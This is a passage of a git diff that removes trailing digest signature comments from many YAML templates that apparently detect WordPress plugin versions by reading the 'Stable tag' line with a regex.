490a00463044022039d75150ccd828fb569943d909756179cf964f5b6f0614990e6176641400dd2002203b5122523f9db6d04fa2226a898686c7461068404fd3b189863488bf63488323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 484c39f088..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6194b80c6c247ff1650f8cf3ac2bbb4917208d3dc306a763fa69f5b9b94b4e3022100890eb6299c68ac4f0e2dfd6effff3ab8599d8523c77ec28f6e3481e306011e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 54ab4e260b..6ac2212b4b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a92ad81001907ad4fc8269f1c66bbbe612d25b02b759378ba69b2e3066a7ebbc0221009eb34a2615dcaaee0c9b3c691ede65310acd486ae5155d9f680299f235652d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 18cc34549a..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b1beb4684ff72a3c26a8679d5a614a18b331aab2204ab91c76a9a9b8773d7f6c022100e6716ea28739cf44947a0eca3dc8628339526a7a93a29cb1566d2d8a028a66ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 5a007dcf68..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205cf0ef143cc14f2d797c9c2fc4db3036b877ba5afab77ba87c1b86e951487eb5022100ecdc0eea898bea50512ea0d5704fd6cd23425573f8d00f4b983a25368ac2dec9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 30157301c1..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f4b0eabd8fddcbb79b950f06f942c643754240a74369489eb61d8a8eddc607a02200758057da50ad5531e5bca0f02a07cecaadbd6f731aece531bfed03aa411bc0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c024321503..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f71554852634841210ac763ce5a9aad44b2d69afeebca67f61c66be5564de733022100c45a085f4e0b5460b97783af86acd862646ec095039539f2ca6c5ce8ae0ddaea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 6b31d01412..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a12414fb231a495fedca989f7b3c54914478684a9c8ecac2b9fb3300c7d47df6022100de0bc6bb086e0120933146ad0a0b72b5c8f98ad30fecc02f576667f79a5b871a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 8d958ade1c..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009b107b174d1b8f9a2a6d7cfdecc797d83b44e5c3bbbc02d90f161f14b2593c5a022100e1a2ff228ffc317813e812b6f3baeca9393b5bb322f59f130aa72b16f1c01eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 1b9addeb07..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a6128d54d82be043663dff4f972cfdfd3cd137f27fe4e017e160faf370a134b6022069e7cb92ff82136bd0d74b7414ea9c4439c41ecbb6a0fa7b10ee057951371711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index ff3092a464..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f2dc9757e45fc695027ab663b452277610ee7e139b6aa87696a4db093568bfa8022100c1d666b25a8b97cac7335fc2f6a7044403012b839d005f7f40fd5c86facfe7c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 9217f4fbd5..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036059f66da261c2a8ee71727f24ec782ff1fddda5b44d4bbe8b78c8b4690a4c6022000ee47c57e59d3ad649548dfa85e03c8d966662767b170ca0d8f414773ec2331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 535f97e491..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210080f54bcefacc6cd94d98466964a2bf71df85edfb13452506f4ff38d87032d08502210084afcb8351a98658120c63a4045ab2d220c6f158d6f59f2eba31524e7958b9e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index add53c2d12..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0c66f7ec989ea38743245c2f0562ea776d8b3829b10ef696485cfc12b7f4481022100c19c5cc82cacd0517a4bbd102de31d6598d28d57b4e371cce75ab6cae2fdd10e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index a337f3bbfa..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022047b57340508068bd2ffa0631dab31f7c38b5877ccab05ede996160e4f20fc2a802201e6e22f8ad2bf9244f615455a957e6d4763b8f963a00778a9b1aa85255109e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index f96bbb948d..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022019a0c6c7eb2f133a83e8f199b08e06457969b09eeded920121d4e5443aa92a7102200093827b0790c9e687d5a8374f942ba41a426169bb0a4f10af8bb30a75f39c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 8e4e114dab..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c94e73033deeb473ea998f051666deaa737c6c395f527541deaaaca7e64b5cb0221009dea8218ec6c5d06c7d39cb092ced242945a5fd3e42e6ddd42eba3de7d860508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 92f53b09ff..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220756be2ca6c9541d3748420a86867c7d58994c65cfebeb14d16a2e0334a79e01e02210086d631906b7c1c3e9f906d7620e63886bb31b0f1ad2502cc9c1b920a47a07952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index e6e1027716..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202afe1d73e46ca25c8904e9f623cd2c130262e20ee3bf754ee38211cf82a3d22c022046df4687cc95a47744e9efb5c1627809f6cb905136d53667e544834dd67fedd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index eaefc0250b..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220493556aa99680e9885a078404ec0512feec63711cf8d5f7d3b550d21742bde37022100e89f0393ff67ee0f2ee699056e63b9f99267ed11c82fa33c336d28c3125b4d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 5918066ef7..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204656517e139fbe20cf954bb143fd8ebf6efbaa219352a3eb83382c3d1fb8f27202205aaac9792ab9b57fdfe4e564e5458da04ae4e936c1ef8ab30ca790894ee96db3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 179d94e3e4..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d0e94f0362b758a37c28342cadf8a1229248d7171067ffa2ff273e62c05600e022100c345d6f1b379f741a3e638bbec4dd51969f9f7a153233ed1a29432b85eb8bf1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 3b7017d237..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fc715de8496e59600ea5b5d35d6468143b39bd54adc3b1fe503a0af6416a8e17022049ae046a19a7915d07fe18e6999211192df69c3389a36317302796da02b8562a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 137365fe60..f7c9ef9b1f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cefbf547ab03be08641d3bd631046ed0b1fdbf5f42cf84d9e2695d67ff02b68022100a5286f2e5be8756cd5709596c327cb4848f8ec6ec40723be370d413dccfbed02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 7d709de01b..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204af38208f4f48684e3908ea141ba53bceeae4802d5a769f512d82fa9e4b0df0d022100cdc3231fef1d2619470266c0c9d0c970dc3ed67060088a71138ac813c60ce676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 430a651a0e..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a007ad4c3e170e5e9724c784f6858fddfc0de0123f3714b25f98dff5fb02e9320221009b223fff05305f3d6623c0d5cc674be99bdd351f52f55b9c93f38e44cdbdcfc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 4ec76ea793..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220236c946c20bbb3d29a33d255e08e0e81e0088cbd4bf4d915df47cd0a588b187d022100b13009ba9046677c99152deb3e02a0cba8546f9742628461a647187f048efaf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 667c4da047..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ce994997bb563fd17a8c5ee7692bf88a56117474297eb6e584d8179fedeaeee022030296cb670ed8f79587b71bda24a63f3a1776623ce7e53cabee62dee365ceeb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index e34e129f76..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071babc52c0b5083daddc8433173a41e8bab7e39f3b2046995afd845a8741c1b202204996bc2ae7811dbc5a45217bc1fde9d01161757bff3911af637dd87d5b3cf711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 45caeebca5..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206271e05293f7789b913086fe9a6bcbceaec54a582474d0561482bc8c55b9656f022100e8698941f8d777145d70f46129410d1bca5d60aaa4e07b6ec6d60316bf2ab7d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index a752a4eb84..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051969c33ac2dc32425b0f72d97b3b9063b23bd1bed94fd5328b48ab41d4149ce0220287139401188663d022d125d5ee87bae597f5c2040ba17353cc0737f2767515c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index 0344648ec1..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009214eb5f0714ef7bcf236a9b4a121c119311e77cdd380900d36cbc074d9762c8022015d19aa54ba3017bcf21f6c7fb547c63329ee3599af57359685d29bee6368233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 640ffe6cdc..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016246ad03703bbd7b5e4a95a4e8f63fb9aa353e631331891cad1c838aaaab4730221009099ff3a34a676a47c97c0c9cbe0f5fcb118c4d3c686dcc411489400ee0734f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index ac5c1dba02..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c876601936e635755be1639daa4331c47604fc7650f0069bfc01145469620132022100f3b2fbf1d7557845ca8646075adef84b8098a5ba71d43f9b28e52a040b190900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 88e604ccb5..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b75d7e19c54b090952f85bf295c71d10e6d1d682f5c1e9243519ac408ab59a14022100f41f4b1073b3cb80f2f492db1da8706a19ae3e8f37915510b9fed7bba31f8527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 546805cd6e..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206cd245c05fb4123792e2d65565ee4feb7dd9d7dd66af890ddee34c8967c99d9d022010b8dc67e4a9242765d3c6ba45d6f4d7e95e4c981980264bc50436a187e87908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 6ff51ba81d..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053e200b772446b6464d829cb5269d9d8ad420f04d4cddc03b837aa63b715364d022048282b7f9cc20738c0e9900efdd9cdbe67b0a496dcb65cb5745d53909003d5a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 9f537cacb5..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d233884dc23fd43df7efe16480f0becf2bec6dae55fcf013e2826c7e3c74f406022100f6043c52854074ed05cd76062b13c6481afd9ad6398d1de7e5ffa5b88e6006a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 58d70175fe..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100be7f07315c32cfa3f34119f6f2325048723d2f23701743a7f45ed53aa21ba8b302206b859c7c658e87688891a55bd6619c8b21c3dbd815cf7d651ce77e256fa388b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 01cadea2ec..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cacb5cbab8f8aa9bad9e3b7dbe7eae7823efeb1155a92058142c09d754a4780b022100a988cf559bc86ff891281bc18ac71004d78d0c9b93ddaf4958546eacda864ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index c9ec315a05..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022063e8d6cdd63e47062906eb576e1ee724f2fc90febfc1f76ce13369850d1efc2102200a227b560c0f2dd5559ee49731a100e9b39e2ba9892357c71e1f0d5d7b40d59a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 9b8bf26b0b..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0311d0b81b978b292b33f77421547ca5f07123ed37096b299ca69d2051247b6022100f6958782436778744add69e8122c20acba7e6b9cfe2fbafbc4ff1160fc42196d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index b746208597..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1bd0755f079769d5bc04ea47ded857b919a4317fbe448840c69f249a58481aa02203cf8aca3eb854a7d46cdb6f456af7f9103f70e17d6299b2f4f540adc6ec840a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0637e1ac4d..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202bf0cf60eacf5f650ea30cc9a5dd49d521dd2c4d95b2cde0a7fad5bfcfc07d4b022068570d84457624853af7d98de2cbda57484fe6a82ed0d6860cbaa6045de39a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 5b8501a019..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201e47e6aefc3d1aed8d25a827b145231ab8ffee88a1ed079683697fcf0566950e02210080170b10765f006c7af107c592f5267921c48e4f05200946078f4ccd0c936770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index b46d1cb42c..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207e2ca3a745ffc69691a173f10f39ab06d85691623843c3fa1e9b308979a83672022100d7862afc23c5d0408c3f1380e509062fcf17198de7bef72d2f89811cee038112:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2e02098549..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098035c3e58a7030463a1f11c0459f7cc02a5bee535e713e0862668fe8e7bec83022006a4953eb34a3fe24f115d9dd19424dea3f711f7ce6e1394546535493dd07e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 43986c5bd5..5b690d96c0 100644 